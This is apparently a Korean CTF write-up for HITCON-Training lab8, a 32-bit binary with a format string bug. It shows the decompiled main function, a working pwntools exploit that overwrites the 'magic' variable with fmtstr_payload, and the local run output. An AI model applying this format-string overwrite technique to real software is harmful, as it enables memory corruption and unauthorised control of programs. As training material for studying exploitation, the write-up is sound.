Wargame & CTF/HITCON-Training
[HITCON-Training] lab8
cg10036
2019. 11. 18. 08:17
Summary
32bit
format string bug
Analysis
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf; // [esp+Ch] [ebp-10Ch]
unsigned int v5; // [esp+10Ch] [ebp-Ch]
v5 = __readgsdword(0x14u);
setvbuf(_bss_start, 0, 2, 0);
puts("Please crax me !");
printf("Give me magic :");
read(0, &buf, 0x100u);
printf(&buf);
if ( magic == 218 )
{
system("cat /home/craxme/flag");
}
else if ( magic == -87117812 )
{
system("cat /home/craxme/craxflag");
}
else
{
puts("You need be a phd");
}
return 0;
}입력한것을 출력하는 부분에서 포멧스트링버그가 터진다.
Exploit
from pwn import *
e = ELF("./craxme")
p = process("./craxme")
#payload = fmtstr_payload(7, {e.symbols["magic"] : 218})
payload = fmtstr_payload(7, {e.symbols["magic"] : -87117812})
p.send(payload)
p.interactive()cg10036@cg10036-virtual-machine:~/HITCON-Training/LAB/lab8$ p ex.py
[*] '/home/cg10036/HITCON-Training/LAB/lab8/craxme'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Starting local process './craxme': pid 3447
[*] Switching to interactive mode
Please crax me !
Give me magic :8\xa0\x09\xa0\x0:\xa0\x0;\xa0\x0 \x9c \x00 \x00 \x00[*] Process './craxme' stopped with exit code 0 (pid 3447)
cat: /home/craxme/craxflag: 그런 파일이나 디렉터리가 없습니다from pwn import *
e = ELF("./craxme")
p = process("./craxme")
payload = fmtstr_payload(7, {e.symbols["magic"] : 218})
#payload = fmtstr_payload(7, {e.symbols["magic"] : -87117812})
p.send(payload)
p.interactive()cg10036@cg10036-virtual-machine:~/HITCON-Training/LAB/lab8$ p ex.py
[*] '/home/cg10036/HITCON-Training/LAB/lab8/craxme'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Starting local process './craxme': pid 3461
[*] Switching to interactive mode
Please crax me !
Give me magic :8\xa0\x09\xa0\x0:\xa0\x0;\xa0\x0 | \x00 [*] Process './craxme' stopped with exit code 0 (pid 3461)
cat: /home/craxme/flag: 그런 파일이나 디렉터리가 없습니다포멧스트링버그로 magic을 덮어씌우면 된다.